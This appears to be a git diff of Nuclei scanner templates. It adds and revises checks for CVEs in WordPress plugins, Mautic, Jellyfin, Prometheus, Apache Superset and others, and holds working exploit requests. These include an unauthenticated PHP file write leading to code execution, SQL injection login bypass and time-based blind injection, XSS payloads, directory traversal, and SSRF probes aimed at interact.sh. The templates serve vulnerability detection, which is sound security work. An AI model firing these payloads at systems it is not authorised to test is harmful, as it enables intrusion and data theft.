- https://nvd.nist.gov/vuln/detail/CVE-2021-24940
|
||||
|
@ -41,3 +42,5 @@ requests:
|
|||
- contains(body_2, 'accesskey=X onclick=alert(1) test=')
|
||||
- contains(body_2, 'woocommerce_persian_translate')
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/10/17
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
tags: wordpress,guppy,api,cve2021,cve,wp-plugin,edb,wpscan
|
||||
|
||||
requests:
|
||||
- method:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="
|
||||
|
||||
|
|
|
@ -0,0 +1,51 @@
|
|||
id: CVE-2021-25003
|
||||
|
||||
info:
|
||||
name: WPCargo < 6.9.0 - Unauthenticated Remote Code Execution
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
|
||||
- https://wordpress.org/plugins/wpcargo/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25003
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-25003
|
||||
cwe-id: CWE-434
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan
|
||||
|
||||
variables:
|
||||
num: "999999999"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
2={{md5(num)}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code_1 != 200"
|
||||
- "status_code_2 == 200"
|
||||
- "status_code_3 == 200"
|
||||
- "contains(body_3, md5(num))"
|
||||
- "contains(body_3, 'PNG')"
|
||||
condition: and
|
|
@ -1,12 +1,13 @@
|
|||
id: CVE-2021-25111
|
||||
|
||||
info:
|
||||
name: English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect
|
||||
name: WordPress English Admin <1.5.2 - Open Redirect
|
||||
author: akincibor
|
||||
severity: medium
|
||||
description: The plugin does not validate the admin_custom_language_return_url before redirecting users o it, leading to an open redirect issue.
|
||||
description: WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25111
|
||||
tags: cve2021,unauth,wpscan,wp-plugin,redirect,wordpress,wp,cve
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
|
@ -24,3 +25,5 @@ requests:
|
|||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
# Enhanced by md on 2022/10/14
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2021-27909
|
||||
|
||||
info:
|
||||
name: Mautic - Cross-Site Scripting
|
||||
name: Mautic <3.3.4 - Cross-Site Scripting
|
||||
author: kiransau
|
||||
severity: medium
|
||||
description: Mautic versions prior to 3.3.4 are vulnerable to reflected XSS on password reset page where a vulnerable parameter, "bundle," in the URL could allow an attacker to execute Javascript code.
|
||||
description: Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks.
|
||||
reference:
|
||||
- https://github.com/mautic/mautic/security/advisories/GHSA-32hw-3pvh-vcvc
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-27909
|
||||
|
@ -40,3 +40,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/10/17
|
||||
|
|
|
@ -1,31 +1,36 @@
|
|||
id: CVE-2021-29490
|
||||
|
||||
info:
|
||||
name: Jellyfin 10.7.2 SSRF
|
||||
name: Jellyfin 10.7.2 - SSRF
|
||||
author: alph4byt3
|
||||
severity: medium
|
||||
description: Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
|
||||
description: |
|
||||
Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-29490
|
||||
- https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-29490
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
|
||||
cvss-score: 5.8
|
||||
cve-id: CVE-2021-29490
|
||||
cwe-id: CWE-918
|
||||
remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote".
|
||||
tags: cve,cve2021,ssrf,jellyfin
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"Jellyfin"
|
||||
tags: cve,cve2021,ssrf,jellyfin,oast
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/Images/Remote?imageUrl=http://{{interactsh-url}}"
|
||||
- "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=http://{{interactsh-url}}&ProviderName=TheMovieDB"
|
||||
- "{{BaseURL}}/Images/Remote?imageUrl=http://interact.sh/"
|
||||
- "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=http://interact.sh/&ProviderName=TheMovieDB"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
part: body
|
||||
words:
|
||||
- "http"
|
||||
- "<h1> Interactsh Server </h1>"
|
||||
|
||||
# Enhanced by cs on 2022/02/25
|
||||
|
|
|
@ -1,14 +1,16 @@
|
|||
id: CVE-2021-29622
|
||||
|
||||
info:
|
||||
name: Prometheus v2.23.0 to v2.26.0, and v2.27.0 Open Redirect
|
||||
name: Prometheus - Open Redirect
|
||||
author: geeknik
|
||||
severity: medium
|
||||
description: In 2.23.0, Prometheus changed its default UI to the New ui. To ensure a seamless transition, the URL's prefixed by /new redirect to /. Due to a bug in the code, it is possible for an attacker to craft an URL that can redirect to any other URL, in the /new endpoint.
|
||||
description: Prometheus 2.23.0 through 2.26.0 and 2.27.0 contains an open redirect vulnerability. To ensure a seamless transition to 2.27.0, the default UI was changed to the new UI with a URL prefixed by /new redirect to /. Due to a bug in the code, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
remediation: The issue was patched in the 2.26.1 and 2.27.1 releases. In 2.28.0, the /new endpoint will be removed completely. The workaround is to disable access to /new via a reverse proxy in front of Prometheus.
|
||||
reference:
|
||||
- https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7
|
||||
- https://github.com/prometheus/prometheus/releases/tag/v2.26.1
|
||||
- https://github.com/prometheus/prometheus/releases/tag/v2.27.1
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-29622
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -26,3 +28,5 @@ requests:
|
|||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||
part: header
|
||||
|
||||
# Enhanced by md on 2022/10/14
|
||||
|
|
|
@ -1,12 +1,10 @@
|
|||
id: CVE-2021-32618
|
||||
|
||||
info:
|
||||
name: Flask Open Redirect
|
||||
name: Python Flask-Security - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit
|
||||
library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com
|
||||
will pass FS's relative URL check however many browsers will gladly convert this to http://interact.sh.
|
||||
description: Python Flask-Security contains an open redirect vulnerability. Existing code validates that the URL specified in the next parameter is either relative or has the same network location as the requesting URL. Certain browsers accept and fill in the blanks of possibly incomplete or malformed URLs. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c
|
||||
- https://github.com/Flask-Middleware/flask-security/issues/486
|
||||
|
@ -28,3 +26,5 @@ requests:
|
|||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
# Enhanced by md on 2022/10/14
|
||||
|
|
|
@ -0,0 +1,64 @@
|
|||
id: CVE-2021-33851
|
||||
|
||||
info:
|
||||
name: Customize Login Image < 3.5.3 - Cross-Site Scripting
|
||||
author: 8authur
|
||||
severity: medium
|
||||
description: |
|
||||
A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
|
||||
- https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
|
||||
- https://wordpress.org/plugins/customize-login-image/
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2021-33851
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2021-33851
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: wpscan,cve2021,wordpress,customize-login-image,wp,authenticated,cve,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /wp-admin/options.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
option_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=
|
||||
|
||||
- |
|
||||
GET /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_4 == 200'
|
||||
- 'contains(all_headers_4, "text/html")'
|
||||
- 'contains(body_4, "Go to <script>alert(document.domain)</script>")'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: nonce
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
|
||||
internal: true
|
|
@ -1,15 +1,16 @@
|
|||
id: CVE-2021-3654
|
||||
|
||||
info:
|
||||
name: noVNC Open Redirect
|
||||
name: Nova noVNC - Open Redirect
|
||||
author: geeknik
|
||||
severity: medium
|
||||
description: A user-controlled input redirects noVNC users to an external website.
|
||||
description: Nova noVNC contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://seclists.org/oss-sec/2021/q3/188
|
||||
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654
|
||||
- https://bugs.python.org/issue32084
|
||||
- https://opendev.org/openstack/nova/commit/04d48527b62a35d912f93bc75613a6cca606df66
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3654
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -34,3 +35,5 @@ requests:
|
|||
status:
|
||||
- 302
|
||||
- 301
|
||||
|
||||
# Enhanced by md on 2022/10/14
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-37704
|
||||
|
||||
info:
|
||||
name: phpinfo Resource Exposure
|
||||
name: phpfastcache - phpinfo Resource Exposure
|
||||
author: whoever
|
||||
severity: medium
|
||||
description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache.
|
||||
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 4.3
|
||||
cve-id: CVE-2021-37704
|
||||
cwe-id: CWE-668
|
||||
tags: cve,cve2021,exposure,phpfastcache,phpinfo
|
||||
tags: cve,cve2021,exposure,phpfastcache,phpinfo,phpsocialnetwork
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -23,6 +23,7 @@ requests:
|
|||
- "{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php"
|
||||
- "{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -14,7 +14,7 @@ info:
|
|||
cvss-score: 5.3
|
||||
cve-id: CVE-2021-39327
|
||||
cwe-id: CWE-200
|
||||
tags: exposures,packetstorm,cve,cve2021,wordpress
|
||||
tags: exposure,packetstorm,cve,cve2021,wordpress
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2021-40661
|
||||
|
||||
info:
|
||||
name: IND780 - Directory Traversal
|
||||
author: For3stCo1d
|
||||
severity: high
|
||||
description: |
|
||||
A remote, unauthenticated, directory traversal vulnerability was identified within the web interface used by IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10'). It was possible to traverse the folders of the affected host by providing a traversal path to the 'webpage' parameter in AutoCE.ini This could allow a remote unauthenticated adversary to access additional files on the affected system. This could also allow the adversary to perform further enumeration against the affected host to identify the versions of the systems in use, in order to launch further attacks in future.
|
||||
reference:
|
||||
- https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661
|
||||
- https://www.mt.com/au/en/home/products/Industrial_Weighing_Solutions/Terminals-and-Controllers/terminals-bench-floor-scales/advanced-bench-floor-applications/IND780/IND780_.html#overviewpm
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-40661
|
||||
cwe-id: CWE-22
|
||||
metadata:
|
||||
google-query: inurl:excalweb.dll
|
||||
shodan-query: IND780
|
||||
verified: "true"
|
||||
tags: cve,cve2021,ind780,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'ExePath=\Windows'
|
||||
- 'WorkDir=\Windows'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2021-41432
|
||||
|
||||
info:
|
||||
name: FlatPress 1.2.1 - Cross-site scripting
|
||||
name: FlatPress 1.2.1 - Stored Cross-Site Scripting
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
A stored cross-site scripting (XSS) vulnerability exists in FlatPress 1.2.1 that allows for arbitrary execution of JavaScript commands through blog content.
|
||||
FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://github.com/flatpressblog/flatpress/issues/88
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41432
|
||||
|
@ -74,3 +74,5 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- 'name="_wpnonce" value="([0-9a-z]+)" />'
|
||||
|
||||
# Enhanced by md on 2022/10/17
|
||||
|
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2021-43510
|
||||
|
||||
info:
|
||||
name: Simple Client Management System 1.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the username field in login.php.
|
||||
reference:
|
||||
- https://github.com/r4hn1/Simple-Client-Management-System-Exploit/blob/main/CVE-2021-43510
|
||||
- https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-43510
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-43510
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,simpleclientmanagement,sqli,auth-bypass
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /classes/Login.php?f=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username=admin'+or+'1'%3d'1'--+-&password=as
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
req-condition: true
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(all_headers_1, "text/html")'
|
||||
- 'status_code_1 == 200'
|
||||
- 'contains(body_1, "{\"status\":\"success\"}")'
|
||||
- 'contains(body_2, "Welcome to Simple Client")'
|
||||
condition: and
|
|
@ -1,15 +1,15 @@
|
|||
id: CVE-2021-44451
|
||||
|
||||
info:
|
||||
name: Apache Superset Default Login
|
||||
name: Apache Superset - Default Login
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
|
||||
description: |
|
||||
Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
|
||||
reference:
|
||||
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
|
||||
- https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb
|
||||
remediation: Users should upgrade to Apache Superset 1.4.0 or higher.
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 6.5
|
||||
|
@ -25,17 +25,18 @@ requests:
|
|||
- |
|
||||
GET /login/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
|
||||
- |
|
||||
POST /login/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{BaseURL}}/admin/airflow/login
|
||||
|
||||
csrf_token={{csrf_token}}&username={{username}}&password={{password}}
|
||||
|
||||
- |
|
||||
GET /dashboard/list/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
|
@ -43,32 +44,25 @@ requests:
|
|||
password:
|
||||
- admin
|
||||
|
||||
req-condition: true
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header_2
|
||||
words:
|
||||
- 'session'
|
||||
|
||||
- type: word
|
||||
part: body_3
|
||||
words:
|
||||
- 'DashboardFilterStateRestApi'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf_token
|
||||
group: 1
|
||||
part: body
|
||||
internal: true
|
||||
regex:
|
||||
- 'value="(.*?)">'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
condition: and
|
||||
words:
|
||||
- '<title>Redirecting...</title>'
|
||||
- '<h1>Redirecting...</h1'
|
||||
- '<a href="/">'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'session'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
||||
|
||||
# Enhanced by mp on 2022/03/02
|
||||
- 'name="csrf_token" type="hidden" value="(.*)"'
|
||||
internal: true
|
||||
|
|
|
@ -0,0 +1,52 @@
|
|||
id: CVE-2022-0147
|
||||
|
||||
info:
|
||||
name: Cookie Information < 2.0.8 - Reflected Cross-Site Scripting
|
||||
author: 8arthur
|
||||
severity: medium
|
||||
description: |
|
||||
The Cookie Information plugin does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/2c735365-69c0-4652-b48e-c4a192dfe0d1
|
||||
- https://wordpress.org/plugins/wp-gdpr-compliance/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0147
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-0147
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve2022,wordpress,xss,wp,authenticated,cve,wp-plugin,wp-gdpr-compliance,wpscan
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=wp-gdpr-compliance&x=%27+onanimationstart%3Dalert%28document.domain%29+style%3Danimation-name%3Arotation+x HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "x=\\' onanimationstart=alert(document.domain) style=animation-name:rotation x'"
|
||||
- "toplevel_page_wp-gdpr-compliance"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,7 +2,7 @@ id: CVE-2022-0346
|
|||
|
||||
info:
|
||||
name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting
|
||||
author: Akincibor
|
||||
author: Akincibor,theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a vulnerability that can lead to cross-site scripting or remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
|
||||
|
@ -16,35 +16,26 @@ info:
|
|||
cve-id: CVE-2022-0346
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,xss,wp,wordpress,wp-plugin,wpscan
|
||||
verified: true
|
||||
tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
|
||||
- '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
|
||||
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5("CVE-2022-0346");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
|
||||
|
||||
stop-at-first-match: true
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "contains(body_1, 'PHP Extension') || contains(body_1, 'PHP Version')"
|
||||
- "status_code==200 && contains(body_2, '<img src onerror=alert(document.domain)>') && contains(body_2, ' type specified')"
|
||||
condition: or
|
||||
- type: word
|
||||
part: body_1
|
||||
words:
|
||||
- "<img src onerror=alert(document.domain)>"
|
||||
- "Invalid Provider type specified"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
part: body_2
|
||||
words:
|
||||
- text/html
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '>PHP Version <\/td><td class="v">([0-9.]+)'
|
||||
|
||||
# Enhanced by md on 2022/09/08
|
||||
- "2ef3baa95802a4b646f2fc29075efe34"
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2022-0349
|
||||
|
||||
info:
|
||||
name: NotificationX WordPress plugin < 2.3.9 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
The NotificationX WordPress plugin before 2.3.9 does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a
|
||||
- https://wordpress.org/plugins/notificationx/advanced/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0349
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0349
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,cve
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
POST /?rest_route=/notificationx/v1/analytics HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
nx_id=sleep(6) -- x
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(body, "\"data\":{\"success\":true}")'
|
||||
condition: and
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0412
|
||||
|
||||
info:
|
||||
name: TI WooCommerce Wishlist WP plugin < 1.40.1 - SQL Injection
|
||||
name: WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
